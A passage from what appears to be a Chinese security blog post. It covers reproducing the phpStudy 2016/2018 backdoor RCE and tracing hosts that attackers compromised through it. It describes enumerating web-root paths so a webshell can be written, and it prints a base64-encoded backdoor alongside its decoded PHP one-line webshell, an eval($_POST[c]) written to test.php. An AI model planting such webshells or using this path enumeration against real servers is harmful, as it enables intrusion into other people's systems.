(2)我们可以看到上面的这个Python复现phpstudy远程RCE的脚本针对于单一命令的phpstudy部署的站点例如这种界面额的还比较方便,如果我们不知道绝对路径是不是就不能写入webshell了?????其实这并不会!!!!
(3)针对于phpstudy指针页面无法访问的我们其实可以枚举一下他的物理路径地址即可,不知道绝地路径可以枚举一下物理的绝对理解
Path=['C:/php/WWW',"D:/php/WWW","E:/php/WWW"........]然后把列表中的绝地地址元素传入函数中递归请求判断即可,这里就不贴出代码了。
(4)与此同时各位老表在进行枚举检测,但是作为一个白帽子,千万不要越过红线。建议大家检测的时候不要写入一句话木马,直接写出一个phpinfo();比较好也是保护了自己。
(5)Python脚本复现Phpstudy 2016/2018远程RCE漏洞效果:
四、针对部署phpstudy环境服务器已被入侵的主机进行溯源分析:(1)我在进行随机检测phpstudy的时候已经发现了部分感染主机被黑帽seo利用了,用于增加搜索引擎关键词的排名来吸引流量。
(2)部分检测到存在漏洞phpstudy服务器主机网站根目录下高频出现的php一句话木马文件名如下:
(3)下面的这三位仁兄(大黑客)就是通过了echo的方式写入了webshell一句话木马到网站的根目录下进行链接,先放到一边后面在一起做后门取证。
(4)另类的后门“lishunsheng.php”应该是一个人名的拼音,应该是李姓氏的。
ZnB1dHMoZ**wZW4oJy4vdGVzdC5waHAnLCd3KycpLCc8P3BocCBldmFsKCRfUE9TVFtjXSk7Pz4nKTs=
(5)解密后
fputs(fopen('./test.php','w+'),'<?php eval($_POST[c]);?>');
(6)写出文件名为”text.php”链接密码为“c”的webshell一句话木马到网站根目录下方
(7)还有其他的黑客是通过phpmyadmin登录弱口令密码的系统日志文件写入webshell进来的
2019年9月23日17时30分33秒写入
2019年9月23日18时16分33秒写入webshell
图片转载自腾讯电脑管家